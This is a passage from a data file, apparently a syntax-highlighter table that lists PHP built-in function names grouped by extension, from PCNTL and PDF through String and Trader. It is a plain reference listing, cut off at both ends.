'pcntl_exec', 'pcntl_fork', 'pcntl_get_last_error', 'pcntl_getpriority', 'pcntl_setpriority', 'pcntl_signal_dispatch', 'pcntl_signal', 'pcntl_sigprocmask', 'pcntl_sigtimedwait', 'pcntl_sigwaitinfo', 'pcntl_strerror', 'pcntl_wait', 'pcntl_waitpid', 'pcntl_wexitstatus', 'pcntl_wifexited', 'pcntl_wifsignaled', 'pcntl_wifstopped', 'pcntl_wstopsig', 'pcntl_wtermsig'], 'PCRE': ['preg_filter', 'preg_grep', 'preg_last_error', 'preg_match_all', 'preg_match', 'preg_quote', 'preg_replace_callback', 'preg_replace', 'preg_split'], 'PDF': ['PDF_activate_item', 'PDF_add_annotation', 'PDF_add_bookmark', 'PDF_add_launchlink', 'PDF_add_locallink', 'PDF_add_nameddest', 'PDF_add_note', 'PDF_add_outline', 'PDF_add_pdflink', 'PDF_add_table_cell', 'PDF_add_textflow', 'PDF_add_thumbnail', 'PDF_add_weblink', 'PDF_arc', 'PDF_arcn', 'PDF_attach_file', 'PDF_begin_document', 'PDF_begin_font', 'PDF_begin_glyph', 'PDF_begin_item', 'PDF_begin_layer', 'PDF_begin_page_ext', 'PDF_begin_page', 'PDF_begin_pattern', 'PDF_begin_template_ext', 'PDF_begin_template', 'PDF_circle', 'PDF_clip', 'PDF_close_image', 'PDF_close_pdi_page', 'PDF_close_pdi', 'PDF_close', 'PDF_closepath_fill_stroke', 'PDF_closepath_stroke', 'PDF_closepath', 'PDF_concat', 'PDF_continue_text', 'PDF_create_3dview', 'PDF_create_action', 'PDF_create_annotation', 'PDF_create_bookmark', 'PDF_create_field', 'PDF_create_fieldgroup', 'PDF_create_gstate', 'PDF_create_pvf', 'PDF_create_textflow', 'PDF_curveto', 'PDF_define_layer', 'PDF_delete_pvf', 'PDF_delete_table', 'PDF_delete_textflow', 'PDF_delete', 'PDF_encoding_set_char', 'PDF_end_document', 'PDF_end_font', 'PDF_end_glyph', 'PDF_end_item', 'PDF_end_layer', 'PDF_end_page_ext', 'PDF_end_page', 'PDF_end_pattern', 'PDF_end_template', 'PDF_endpath', 'PDF_fill_imageblock', 'PDF_fill_pdfblock', 'PDF_fill_stroke', 'PDF_fill_textblock', 'PDF_fill', 'PDF_findfont', 'PDF_fit_image', 'PDF_fit_pdi_page', 'PDF_fit_table', 
'PDF_fit_textflow', 'PDF_fit_textline', 'PDF_get_apiname', 'PDF_get_buffer', 'PDF_get_errmsg', 'PDF_get_errnum', 'PDF_get_font', 'PDF_get_fontname', 'PDF_get_fontsize', 'PDF_get_image_height', 'PDF_get_image_width', 'PDF_get_majorversion', 'PDF_get_minorversion', 'PDF_get_parameter', 'PDF_get_pdi_parameter', 'PDF_get_pdi_value', 'PDF_get_value', 'PDF_info_font', 'PDF_info_matchbox', 'PDF_info_table', 'PDF_info_textflow', 'PDF_info_textline', 'PDF_initgraphics', 'PDF_lineto', 'PDF_load_3ddata', 'PDF_load_font', 'PDF_load_iccprofile', 'PDF_load_image', 'PDF_makespotcolor', 'PDF_moveto', 'PDF_new', 'PDF_open_ccitt', 'PDF_open_file', 'PDF_open_gif', 'PDF_open_image_file', 'PDF_open_image', 'PDF_open_jpeg', 'PDF_open_memory_image', 'PDF_open_pdi_document', 'PDF_open_pdi_page', 'PDF_open_pdi', 'PDF_open_tiff', 'PDF_pcos_get_number', 'PDF_pcos_get_stream', 'PDF_pcos_get_string', 'PDF_place_image', 'PDF_place_pdi_page', 'PDF_process_pdi', 'PDF_rect', 'PDF_restore', 'PDF_resume_page', 'PDF_rotate', 'PDF_save', 'PDF_scale', 'PDF_set_border_color', 'PDF_set_border_dash', 'PDF_set_border_style', 'PDF_set_char_spacing', 'PDF_set_duration', 'PDF_set_gstate', 'PDF_set_horiz_scaling', 'PDF_set_info_author', 'PDF_set_info_creator', 'PDF_set_info_keywords', 'PDF_set_info_subject', 'PDF_set_info_title', 'PDF_set_info', 'PDF_set_layer_dependency', 'PDF_set_leading', 'PDF_set_parameter', 'PDF_set_text_matrix', 'PDF_set_text_pos', 'PDF_set_text_rendering', 'PDF_set_text_rise', 'PDF_set_value', 'PDF_set_word_spacing', 'PDF_setcolor', 'PDF_setdash', 'PDF_setdashpattern', 'PDF_setflat', 'PDF_setfont', 'PDF_setgray_fill', 'PDF_setgray_stroke', 'PDF_setgray', 'PDF_setlinecap', 'PDF_setlinejoin', 'PDF_setlinewidth', 'PDF_setmatrix', 'PDF_setmiterlimit', 'PDF_setpolydash', 'PDF_setrgbcolor_fill', 'PDF_setrgbcolor_stroke', 'PDF_setrgbcolor', 'PDF_shading_pattern', 'PDF_shading', 'PDF_shfill', 'PDF_show_boxed', 'PDF_show_xy', 'PDF_show', 'PDF_skew', 'PDF_stringwidth', 'PDF_stroke', 'PDF_suspend_page', 'PDF_translate', 'PDF_utf16_to_utf8', 'PDF_utf32_to_utf16', 'PDF_utf8_to_utf16'], 'PHP Options/Info': ['assert_options', 'assert', 'cli_get_process_title', 'cli_set_process_title', 'dl', 'extension_loaded', 'gc_collect_cycles', 'gc_disable', 'gc_enable', 'gc_enabled', 'get_cfg_var', 'get_current_user', 'get_defined_constants', 'get_extension_funcs', 'get_include_path', 'get_included_files', 'get_loaded_extensions', 'get_magic_quotes_gpc', 'get_magic_quotes_runtime', 'get_required_files', 'getenv', 'getlastmod', 'getmygid', 'getmyinode', 'getmypid', 'getmyuid', 'getopt', 'getrusage', 'ini_alter', 'ini_get_all', 'ini_get', 'ini_restore', 'ini_set', 'magic_quotes_runtime', 'memory_get_peak_usage', 'memory_get_usage', 'php_ini_loaded_file', 'php_ini_scanned_files', 'php_logo_guid', 'php_sapi_name', 'php_uname', 'phpcredits', 'phpinfo', 'phpversion', 'putenv', 'restore_include_path', 'set_include_path', 'set_magic_quotes_runtime', 'set_time_limit', 'sys_get_temp_dir', 'version_compare', 'zend_logo_guid', 'zend_thread_id', 'zend_version'], 'POSIX': ['posix_access', 'posix_ctermid', 'posix_errno', 'posix_get_last_error', 'posix_getcwd', 'posix_getegid', 'posix_geteuid', 'posix_getgid', 'posix_getgrgid', 'posix_getgrnam', 'posix_getgroups', 'posix_getlogin', 'posix_getpgid', 'posix_getpgrp', 'posix_getpid', 'posix_getppid', 'posix_getpwnam', 'posix_getpwuid', 'posix_getrlimit', 'posix_getsid', 'posix_getuid', 'posix_initgroups', 'posix_isatty', 'posix_kill', 'posix_mkfifo', 'posix_mknod', 'posix_setegid', 'posix_seteuid', 
'posix_setgid', 'posix_setpgid', 'posix_setsid', 'posix_setuid', 'posix_strerror', 'posix_times', 'posix_ttyname', 'posix_uname'], 'POSIX Regex': ['ereg_replace', 'ereg', 'eregi_replace', 'eregi', 'split', 'spliti', 'sql_regcase'], 'PS': ['ps_add_bookmark', 'ps_add_launchlink', 'ps_add_locallink', 'ps_add_note', 'ps_add_pdflink', 'ps_add_weblink', 'ps_arc', 'ps_arcn', 'ps_begin_page', 'ps_begin_pattern', 'ps_begin_template', 'ps_circle', 'ps_clip', 'ps_close_image', 'ps_close', 'ps_closepath_stroke', 'ps_closepath', 'ps_continue_text', 'ps_curveto', 'ps_delete', 'ps_end_page', 'ps_end_pattern', 'ps_end_template', 'ps_fill_stroke', 'ps_fill', 'ps_findfont', 'ps_get_buffer', 'ps_get_parameter', 'ps_get_value', 'ps_hyphenate', 'ps_include_file', 'ps_lineto', 'ps_makespotcolor', 'ps_moveto', 'ps_new', 'ps_open_file', 'ps_open_image_file', 'ps_open_image', 'ps_open_memory_image', 'ps_place_image', 'ps_rect', 'ps_restore', 'ps_rotate', 'ps_save', 'ps_scale', 'ps_set_border_color', 'ps_set_border_dash', 'ps_set_border_style', 'ps_set_info', 'ps_set_parameter', 'ps_set_text_pos', 'ps_set_value', 'ps_setcolor', 'ps_setdash', 'ps_setflat', 'ps_setfont', 'ps_setgray', 'ps_setlinecap', 'ps_setlinejoin', 'ps_setlinewidth', 'ps_setmiterlimit', 'ps_setoverprintmode', 'ps_setpolydash', 'ps_shading_pattern', 'ps_shading', 'ps_shfill', 'ps_show_boxed', 'ps_show_xy2', 'ps_show_xy', 'ps_show2', 'ps_show', 'ps_string_geometry', 'ps_stringwidth', 'ps_stroke', 'ps_symbol_name', 'ps_symbol_width', 'ps_symbol', 'ps_translate'], 'Paradox': ['px_close', 'px_create_fp', 'px_date2string', 'px_delete_record', 'px_delete', 'px_get_field', 'px_get_info', 'px_get_parameter', 'px_get_record', 'px_get_schema', 'px_get_value', 'px_insert_record', 'px_new', 'px_numfields', 'px_numrecords', 'px_open_fp', 'px_put_record', 'px_retrieve_record', 'px_set_blob_file', 'px_set_parameter', 'px_set_tablename', 'px_set_targetencoding', 'px_set_value', 'px_timestamp2string', 'px_update_record'], 'Parsekit': ['parsekit_compile_file', 'parsekit_compile_string', 'parsekit_func_arginfo'], 'Password Hashing': ['password_get_info', 'password_hash', 'password_needs_rehash', 'password_verify'], 'PostgreSQL': ['pg_affected_rows', 'pg_cancel_query', 'pg_client_encoding', 'pg_close', 'pg_connect', 'pg_connection_busy', 'pg_connection_reset', 'pg_connection_status', 'pg_convert', 'pg_copy_from', 'pg_copy_to', 'pg_dbname', 'pg_delete', 'pg_end_copy', 'pg_escape_bytea', 'pg_escape_identifier', 'pg_escape_literal', 'pg_escape_string', 'pg_execute', 'pg_fetch_all_columns', 'pg_fetch_all', 'pg_fetch_array', 'pg_fetch_assoc', 'pg_fetch_object', 'pg_fetch_result', 'pg_fetch_row', 'pg_field_is_null', 'pg_field_name', 'pg_field_num', 'pg_field_prtlen', 'pg_field_size', 'pg_field_table', 'pg_field_type_oid', 'pg_field_type', 'pg_free_result', 'pg_get_notify', 'pg_get_pid', 'pg_get_result', 'pg_host', 'pg_insert', 'pg_last_error', 'pg_last_notice', 'pg_last_oid', 'pg_lo_close', 'pg_lo_create', 'pg_lo_export', 'pg_lo_import', 'pg_lo_open', 'pg_lo_read_all', 'pg_lo_read', 'pg_lo_seek', 'pg_lo_tell', 'pg_lo_truncate', 'pg_lo_unlink', 'pg_lo_write', 'pg_meta_data', 'pg_num_fields', 'pg_num_rows', 'pg_options', 'pg_parameter_status', 'pg_pconnect', 'pg_ping', 'pg_port', 'pg_prepare', 'pg_put_line', 'pg_query_params', 'pg_query', 'pg_result_error_field', 'pg_result_error', 'pg_result_seek', 'pg_result_status', 'pg_select', 'pg_send_execute', 'pg_send_prepare', 'pg_send_query_params', 'pg_send_query', 'pg_set_client_encoding', 'pg_set_error_verbosity', 'pg_trace', 
'pg_transaction_status', 'pg_tty', 'pg_unescape_bytea', 'pg_untrace', 'pg_update', 'pg_version'], 'Printer': ['printer_abort', 'printer_close', 'printer_create_brush', 'printer_create_dc', 'printer_create_font', 'printer_create_pen', 'printer_delete_brush', 'printer_delete_dc', 'printer_delete_font', 'printer_delete_pen', 'printer_draw_bmp', 'printer_draw_chord', 'printer_draw_elipse', 'printer_draw_line', 'printer_draw_pie', 'printer_draw_rectangle', 'printer_draw_roundrect', 'printer_draw_text', 'printer_end_doc', 'printer_end_page', 'printer_get_option', 'printer_list', 'printer_logical_fontheight', 'printer_open', 'printer_select_brush', 'printer_select_font', 'printer_select_pen', 'printer_set_option', 'printer_start_doc', 'printer_start_page', 'printer_write'], 'Proctitle': ['setproctitle', 'setthreadtitle'], 'Program execution': ['escapeshellarg', 'escapeshellcmd', 'exec', 'passthru', 'proc_close', 'proc_get_status', 'proc_nice', 'proc_open', 'proc_terminate', 'shell_exec', 'system'], 'Pspell': ['pspell_add_to_personal', 'pspell_add_to_session', 'pspell_check', 'pspell_clear_session', 'pspell_config_create', 'pspell_config_data_dir', 'pspell_config_dict_dir', 'pspell_config_ignore', 'pspell_config_mode', 'pspell_config_personal', 'pspell_config_repl', 'pspell_config_runtogether', 'pspell_config_save_repl', 'pspell_new_config', 'pspell_new_personal', 'pspell_new', 'pspell_save_wordlist', 'pspell_store_replacement', 'pspell_suggest'], 'RPM Reader': ['rpm_close', 'rpm_get_tag', 'rpm_is_valid', 'rpm_open', 'rpm_version'], 'RRD': ['rrd_create', 'rrd_error', 'rrd_fetch', 'rrd_first', 'rrd_graph', 'rrd_info', 'rrd_last', 'rrd_lastupdate', 'rrd_restore', 'rrd_tune', 'rrd_update', 'rrd_version', 'rrd_xport', 'rrdc_disconnect'], 'Radius': ['radius_acct_open', 'radius_add_server', 'radius_auth_open', 'radius_close', 'radius_config', 'radius_create_request', 'radius_cvt_addr', 'radius_cvt_int', 'radius_cvt_string', 'radius_demangle_mppe_key', 'radius_demangle', 'radius_get_attr', 'radius_get_tagged_attr_data', 'radius_get_tagged_attr_tag', 'radius_get_vendor_attr', 'radius_put_addr', 'radius_put_attr', 'radius_put_int', 'radius_put_string', 'radius_put_vendor_addr', 'radius_put_vendor_attr', 'radius_put_vendor_int', 'radius_put_vendor_string', 'radius_request_authenticator', 'radius_salt_encrypt_attr', 'radius_send_request', 'radius_server_secret', 'radius_strerror'], 'Rar': ['rar_wrapper_cache_stats'], 'Readline': ['readline_add_history', 'readline_callback_handler_install', 'readline_callback_handler_remove', 'readline_callback_read_char', 'readline_clear_history', 'readline_completion_function', 'readline_info', 'readline_list_history', 'readline_on_new_line', 'readline_read_history', 'readline_redisplay', 'readline_write_history', 'readline'], 'Recode': ['recode_file', 'recode_string', 'recode'], 'SNMP': ['snmp_get_quick_print', 'snmp_get_valueretrieval', 'snmp_read_mib', 'snmp_set_enum_print', 'snmp_set_oid_numeric_print', 'snmp_set_oid_output_format', 'snmp_set_quick_print', 'snmp_set_valueretrieval', 'snmp2_get', 'snmp2_getnext', 'snmp2_real_walk', 'snmp2_set', 'snmp2_walk', 'snmp3_get', 'snmp3_getnext', 'snmp3_real_walk', 'snmp3_set', 'snmp3_walk', 'snmpget', 'snmpgetnext', 'snmprealwalk', 'snmpset', 'snmpwalk', 'snmpwalkoid'], 'SOAP': ['is_soap_fault', 'use_soap_error_handler'], 'SPL': ['class_implements', 'class_parents', 'class_uses', 'iterator_apply', 'iterator_count', 'iterator_to_array', 'spl_autoload_call', 'spl_autoload_extensions', 'spl_autoload_functions', 
'spl_autoload_register', 'spl_autoload_unregister', 'spl_autoload', 'spl_classes', 'spl_object_hash'], 'SPPLUS': ['calcul_hmac', 'calculhmac', 'nthmac', 'signeurlpaiement'], 'SQLSRV': ['sqlsrv_begin_transaction', 'sqlsrv_cancel', 'sqlsrv_client_info', 'sqlsrv_close', 'sqlsrv_commit', 'sqlsrv_configure', 'sqlsrv_connect', 'sqlsrv_errors', 'sqlsrv_execute', 'sqlsrv_fetch_array', 'sqlsrv_fetch_object', 'sqlsrv_fetch', 'sqlsrv_field_metadata', 'sqlsrv_free_stmt', 'sqlsrv_get_config', 'sqlsrv_get_field', 'sqlsrv_has_rows', 'sqlsrv_next_result', 'sqlsrv_num_fields', 'sqlsrv_num_rows', 'sqlsrv_prepare', 'sqlsrv_query', 'sqlsrv_rollback', 'sqlsrv_rows_affected', 'sqlsrv_send_stream_data', 'sqlsrv_server_info'], 'SQLite': ['sqlite_array_query', 'sqlite_busy_timeout', 'sqlite_changes', 'sqlite_close', 'sqlite_column', 'sqlite_create_aggregate', 'sqlite_create_function', 'sqlite_current', 'sqlite_error_string', 'sqlite_escape_string', 'sqlite_exec', 'sqlite_factory', 'sqlite_fetch_all', 'sqlite_fetch_array', 'sqlite_fetch_column_types', 'sqlite_fetch_object', 'sqlite_fetch_single', 'sqlite_fetch_string', 'sqlite_field_name', 'sqlite_has_more', 'sqlite_has_prev', 'sqlite_key', 'sqlite_last_error', 'sqlite_last_insert_rowid', 'sqlite_libencoding', 'sqlite_libversion', 'sqlite_next', 'sqlite_num_fields', 'sqlite_num_rows', 'sqlite_open', 'sqlite_popen', 'sqlite_prev', 'sqlite_query', 'sqlite_rewind', 'sqlite_seek', 'sqlite_single_query', 'sqlite_udf_decode_binary', 'sqlite_udf_encode_binary', 'sqlite_unbuffered_query', 'sqlite_valid'], 'SSH2': ['ssh2_auth_agent', 'ssh2_auth_hostbased_file', 'ssh2_auth_none', 'ssh2_auth_password', 'ssh2_auth_pubkey_file', 'ssh2_connect', 'ssh2_exec', 'ssh2_fetch_stream', 'ssh2_fingerprint', 'ssh2_methods_negotiated', 'ssh2_publickey_add', 'ssh2_publickey_init', 'ssh2_publickey_list', 'ssh2_publickey_remove', 'ssh2_scp_recv', 'ssh2_scp_send', 'ssh2_sftp_chmod', 'ssh2_sftp_lstat', 'ssh2_sftp_mkdir', 'ssh2_sftp_readlink', 'ssh2_sftp_realpath', 'ssh2_sftp_rename', 'ssh2_sftp_rmdir', 'ssh2_sftp_stat', 'ssh2_sftp_symlink', 'ssh2_sftp_unlink', 'ssh2_sftp', 'ssh2_shell', 'ssh2_tunnel'], 'SVN': ['svn_add', 'svn_auth_get_parameter', 'svn_auth_set_parameter', 'svn_blame', 'svn_cat', 'svn_checkout', 'svn_cleanup', 'svn_client_version', 'svn_commit', 'svn_delete', 'svn_diff', 'svn_export', 'svn_fs_abort_txn', 'svn_fs_apply_text', 'svn_fs_begin_txn2', 'svn_fs_change_node_prop', 'svn_fs_check_path', 'svn_fs_contents_changed', 'svn_fs_copy', 'svn_fs_delete', 'svn_fs_dir_entries', 'svn_fs_file_contents', 'svn_fs_file_length', 'svn_fs_is_dir', 'svn_fs_is_file', 'svn_fs_make_dir', 'svn_fs_make_file', 'svn_fs_node_created_rev', 'svn_fs_node_prop', 'svn_fs_props_changed', 'svn_fs_revision_prop', 'svn_fs_revision_root', 'svn_fs_txn_root', 'svn_fs_youngest_rev', 'svn_import', 'svn_log', 'svn_ls', 'svn_mkdir', 'svn_repos_create', 'svn_repos_fs_begin_txn_for_commit', 'svn_repos_fs_commit_txn', 'svn_repos_fs', 'svn_repos_hotcopy', 'svn_repos_open', 'svn_repos_recover', 'svn_revert', 'svn_status', 'svn_update'], 'SWF': ['swf_actiongeturl', 'swf_actiongotoframe', 'swf_actiongotolabel', 'swf_actionnextframe', 'swf_actionplay', 'swf_actionprevframe', 'swf_actionsettarget', 'swf_actionstop', 'swf_actiontogglequality', 'swf_actionwaitforframe', 'swf_addbuttonrecord', 'swf_addcolor', 'swf_closefile', 'swf_definebitmap', 'swf_definefont', 'swf_defineline', 'swf_definepoly', 'swf_definerect', 'swf_definetext', 'swf_endbutton', 'swf_enddoaction', 'swf_endshape', 'swf_endsymbol', 'swf_fontsize', 
'swf_fontslant', 'swf_fonttracking', 'swf_getbitmapinfo', 'swf_getfontinfo', 'swf_getframe', 'swf_labelframe', 'swf_lookat', 'swf_modifyobject', 'swf_mulcolor', 'swf_nextid', 'swf_oncondition', 'swf_openfile', 'swf_ortho2', 'swf_ortho', 'swf_perspective', 'swf_placeobject', 'swf_polarview', 'swf_popmatrix', 'swf_posround', 'swf_pushmatrix', 'swf_removeobject', 'swf_rotate', 'swf_scale', 'swf_setfont', 'swf_setframe', 'swf_shapearc', 'swf_shapecurveto3', 'swf_shapecurveto', 'swf_shapefillbitmapclip', 'swf_shapefillbitmaptile', 'swf_shapefilloff', 'swf_shapefillsolid', 'swf_shapelinesolid', 'swf_shapelineto', 'swf_shapemoveto', 'swf_showframe', 'swf_startbutton', 'swf_startdoaction', 'swf_startshape', 'swf_startsymbol', 'swf_textwidth', 'swf_translate', 'swf_viewport'], 'Semaphore': ['ftok', 'msg_get_queue', 'msg_queue_exists', 'msg_receive', 'msg_remove_queue', 'msg_send', 'msg_set_queue', 'msg_stat_queue', 'sem_acquire', 'sem_get', 'sem_release', 'sem_remove', 'shm_attach', 'shm_detach', 'shm_get_var', 'shm_has_var', 'shm_put_var', 'shm_remove_var', 'shm_remove'], 'Session': ['session_cache_expire', 'session_cache_limiter', 'session_commit', 'session_decode', 'session_destroy', 'session_encode', 'session_get_cookie_params', 'session_id', 'session_is_registered', 'session_module_name', 'session_name', 'session_regenerate_id', 'session_register_shutdown', 'session_register', 'session_save_path', 'session_set_cookie_params', 'session_set_save_handler', 'session_start', 'session_status', 'session_unregister', 'session_unset', 'session_write_close'], 'Session PgSQL': ['session_pgsql_add_error', 'session_pgsql_get_error', 'session_pgsql_get_field', 'session_pgsql_reset', 'session_pgsql_set_field', 'session_pgsql_status'], 'Shared Memory': ['shmop_close', 'shmop_delete', 'shmop_open', 'shmop_read', 'shmop_size', 'shmop_write'], 'SimpleXML': ['simplexml_import_dom', 'simplexml_load_file', 'simplexml_load_string'], 'Socket': ['socket_accept', 'socket_bind', 'socket_clear_error', 'socket_close', 'socket_cmsg_space', 'socket_connect', 'socket_create_listen', 'socket_create_pair', 'socket_create', 'socket_get_option', 'socket_getpeername', 'socket_getsockname', 'socket_import_stream', 'socket_last_error', 'socket_listen', 'socket_read', 'socket_recv', 'socket_recvfrom', 'socket_recvmsg', 'socket_select', 'socket_send', 'socket_sendmsg', 'socket_sendto', 'socket_set_block', 'socket_set_nonblock', 'socket_set_option', 'socket_shutdown', 'socket_strerror', 'socket_write'], 'Solr': ['solr_get_version'], 'Statistic': ['stats_absolute_deviation', 'stats_cdf_beta', 'stats_cdf_binomial', 'stats_cdf_cauchy', 'stats_cdf_chisquare', 'stats_cdf_exponential', 'stats_cdf_f', 'stats_cdf_gamma', 'stats_cdf_laplace', 'stats_cdf_logistic', 'stats_cdf_negative_binomial', 'stats_cdf_noncentral_chisquare', 'stats_cdf_noncentral_f', 'stats_cdf_poisson', 'stats_cdf_t', 'stats_cdf_uniform', 'stats_cdf_weibull', 'stats_covariance', 'stats_den_uniform', 'stats_dens_beta', 'stats_dens_cauchy', 'stats_dens_chisquare', 'stats_dens_exponential', 'stats_dens_f', 'stats_dens_gamma', 'stats_dens_laplace', 'stats_dens_logistic', 'stats_dens_negative_binomial', 'stats_dens_normal', 'stats_dens_pmf_binomial', 'stats_dens_pmf_hypergeometric', 'stats_dens_pmf_poisson', 'stats_dens_t', 'stats_dens_weibull', 'stats_harmonic_mean', 'stats_kurtosis', 'stats_rand_gen_beta', 'stats_rand_gen_chisquare', 'stats_rand_gen_exponential', 'stats_rand_gen_f', 'stats_rand_gen_funiform', 'stats_rand_gen_gamma', 'stats_rand_gen_ibinomial_negative', 
'stats_rand_gen_ibinomial', 'stats_rand_gen_int', 'stats_rand_gen_ipoisson', 'stats_rand_gen_iuniform', 'stats_rand_gen_noncenral_chisquare', 'stats_rand_gen_noncentral_f', 'stats_rand_gen_noncentral_t', 'stats_rand_gen_normal', 'stats_rand_gen_t', 'stats_rand_get_seeds', 'stats_rand_phrase_to_seeds', 'stats_rand_ranf', 'stats_rand_setall', 'stats_skew', 'stats_standard_deviation', 'stats_stat_binomial_coef', 'stats_stat_correlation', 'stats_stat_gennch', 'stats_stat_independent_t', 'stats_stat_innerproduct', 'stats_stat_noncentral_t', 'stats_stat_paired_t', 'stats_stat_percentile', 'stats_stat_powersum', 'stats_variance'], 'Stomp': ['stomp_connect_error', 'stomp_version'], 'Stream': ['set_socket_blocking', 'stream_bucket_append', 'stream_bucket_make_writeable', 'stream_bucket_new', 'stream_bucket_prepend', 'stream_context_create', 'stream_context_get_default', 'stream_context_get_options', 'stream_context_get_params', 'stream_context_set_default', 'stream_context_set_option', 'stream_context_set_params', 'stream_copy_to_stream', 'stream_encoding', 'stream_filter_append', 'stream_filter_prepend', 'stream_filter_register', 'stream_filter_remove', 'stream_get_contents', 'stream_get_filters', 'stream_get_line', 'stream_get_meta_data', 'stream_get_transports', 'stream_get_wrappers', 'stream_is_local', 'stream_notification_callback', 'stream_register_wrapper', 'stream_resolve_include_path', 'stream_select', 'stream_set_blocking', 'stream_set_chunk_size', 'stream_set_read_buffer', 'stream_set_timeout', 'stream_set_write_buffer', 'stream_socket_accept', 'stream_socket_client', 'stream_socket_enable_crypto', 'stream_socket_get_name', 'stream_socket_pair', 'stream_socket_recvfrom', 'stream_socket_sendto', 'stream_socket_server', 'stream_socket_shutdown', 'stream_supports_lock', 'stream_wrapper_register', 'stream_wrapper_restore', 'stream_wrapper_unregister'], 'String': ['addcslashes', 'addslashes', 'bin2hex', 'chop', 'chr', 'chunk_split', 'convert_cyr_string', 'convert_uudecode', 'convert_uuencode', 'count_chars', 'crc32', 'crypt', 'echo', 'explode', 'fprintf', 'get_html_translation_table', 'hebrev', 'hebrevc', 'hex2bin', 'html_entity_decode', 'htmlentities', 'htmlspecialchars_decode', 'htmlspecialchars', 'implode', 'join', 'lcfirst', 'levenshtein', 'localeconv', 'ltrim', 'md5_file', 'md5', 'metaphone', 'money_format', 'nl_langinfo', 'nl2br', 'number_format', 'ord', 'parse_str', 'print', 'printf', 'quoted_printable_decode', 'quoted_printable_encode', 'quotemeta', 'rtrim', 'setlocale', 'sha1_file', 'sha1', 'similar_text', 'soundex', 'sprintf', 'sscanf', 'str_getcsv', 'str_ireplace', 'str_pad', 'str_repeat', 'str_replace', 'str_rot13', 'str_shuffle', 'str_split', 'str_word_count', 'strcasecmp', 'strchr', 'strcmp', 'strcoll', 'strcspn', 'strip_tags', 'stripcslashes', 'stripos', 'stripslashes', 'stristr', 'strlen', 'strnatcasecmp', 'strnatcmp', 'strncasecmp', 'strncmp', 'strpbrk', 'strpos', 'strrchr', 'strrev', 'strripos', 'strrpos', 'strspn', 'strstr', 'strtok', 'strtolower', 'strtoupper', 'strtr', 'substr_compare', 'substr_count', 'substr_replace', 'substr', 'trim', 'ucfirst', 'ucwords', 'vfprintf', 'vprintf', 'vsprintf', 'wordwrap'], 'Sybase': ['sybase_affected_rows', 'sybase_close', 'sybase_connect', 'sybase_data_seek', 'sybase_deadlock_retry_count', 'sybase_fetch_array', 'sybase_fetch_assoc', 'sybase_fetch_field', 'sybase_fetch_object', 'sybase_fetch_row', 'sybase_field_seek', 'sybase_free_result', 'sybase_get_last_message', 'sybase_min_client_severity', 'sybase_min_error_severity', 
'sybase_min_message_severity', 'sybase_min_server_severity', 'sybase_num_fields', 'sybase_num_rows', 'sybase_pconnect', 'sybase_query', 'sybase_result', 'sybase_select_db', 'sybase_set_message_handler', 'sybase_unbuffered_query'], 'TCP': ['tcpwrap_check'], 'Taint': ['is_tainted', 'taint', 'untaint'], 'Tidy': ['ob_tidyhandler', 'tidy_access_count', 'tidy_config_count', 'tidy_error_count', 'tidy_get_output', 'tidy_load_config', 'tidy_reset_config', 'tidy_save_config', 'tidy_set_encoding', 'tidy_setopt', 'tidy_warning_count'], 'Tokenizer': ['token_get_all', 'token_name'], 'Trader': ['trader_acos', 'trader_ad', 'trader_add', 'trader_adosc', 'trader_adx', 'trader_adxr', 'trader_apo', 'trader_aroon', 'trader_aroonosc', 'trader_asin', 'trader_atan', 'trader_atr', 'trader_avgprice', 'trader_bbands', 'trader_beta', 'trader_bop', 'trader_cci', 'trader_cdl2crows', 'trader_cdl3blackcrows', 'trader_cdl3inside', 'trader_cdl3linestrike', 'trader_cdl3outside', 'trader_cdl3starsinsouth', 'trader_cdl3whitesoldiers', 'trader_cdlabandonedbaby', 'trader_cdladvanceblock', 'trader_cdlbelthold', 'trader_cdlbreakaway', 'trader_cdlclosingmarubozu', 'trader_cdlconcealbabyswall', 'trader_cdlcounterattack', 'trader_cdldarkcloudcover', 'trader_cdldoji', 'trader_cdldojistar', 'trader_cdldragonflydoji', 'trader_cdlengulfing', 'trader_cdleveningdojistar', 'trader_cdleveningstar', 'trader_cdlgapsidesidewhite', 'trader_cdlgravestonedoji', 'trader_cdlhammer', 'trader_cdlhangingman', 'trader_cdlharami', 'trader_cdlharamicross', 'trader_cdlhighwave', 'trader_cdlhikkake', 'trader_cdlhikkakemod', 'trader_cdlhomingpigeon', 'trader_cdlidentical3crows', 'trader_cdlinneck', 'trader_cdlinvertedhammer', 'trader_cdlkicking', 'trader_cdlkickingbylength', 'trader_cdlladderbottom', 'trader_cdllongleggeddoji', 'trader_cdllongline', 'trader_cdlmarubozu', 'trader_cdlmatchinglow', 'trader_cdlmathold', 'trader_cdlmorningdojistar', 'trader_cdlmorningstar', 'trader_cdlonneck', 'trader_cdlpiercing', 'trader_cdlrickshawman', 'trader_cdlrisefall3methods', 'trader_cdlseparatinglines', 'trader_cdlshootingstar', 'trader_cdlshortline', 'trader_cdlspinningtop', 'trader_cdlstalledpattern', 'trader_cdlsticksandwich', 'trader_cdltakuri', 'trader_cdltasukigap', 'trader_cdlthrusting', 'trader_cdltristar', 'trader_cdlunique3river', 'trader_cdlupsidegap2crows', 'trader_cdlxsidegap3methods', 'trader_ceil', 'trader_cmo', 'trader_correl', 'trader_cos', 'trader_cosh', 'trader_dema', 'trader_div', 'trader_dx', 'trader_ema', 'trader_errno', 'trader_exp', 'trader_floor', 'trader_get_compat', 'trader_get_unstable_period', 'trader_ht_dcperiod', 'trader_ht_dcphase', 'trader_ht_phasor', 'trader_ht_sine', 'trader_ht_trendline', 'trader_ht_trendmode', 'trader_kama', 'trader_linearreg_angle', 'trader_linearreg_intercept', 'trader_linearreg_slope', 'trader_linearreg', 'trader_ln', 'trader_log10', 'trader_ma', 'trader_macd', 'trader_macdext', 'trader_macdfix', 'trader_mama', 'trader_mavp', 'trader_max', 'trader_maxindex', 'trader_medprice', 'trader_mfi', 'trader_midpoint', 'trader_midprice', 'trader_min', 'trader_minindex', 'trader_minmax', 'trader_minmaxindex', 'trader_minus_di', 'trader_minus_dm', 'trader_mom', 'trader_mult', 'trader_natr', 'trader_obv', 'trader_plus_di', 'trader_plus_dm', 'trader_ppo', 'trader_roc', 'trader_rocp', 'trader_rocr100', 'trader_rocr', 'trader_rsi', 'trader_sar', 'trader_sarext', 'trader_set_compat', 'trader_set_unstable_period', 'trader_sin', 'trader_sinh', 'trader_sma', 'trader_sqrt', 'trader_stddev', 'trader_stoch', 'trader_stochf', 
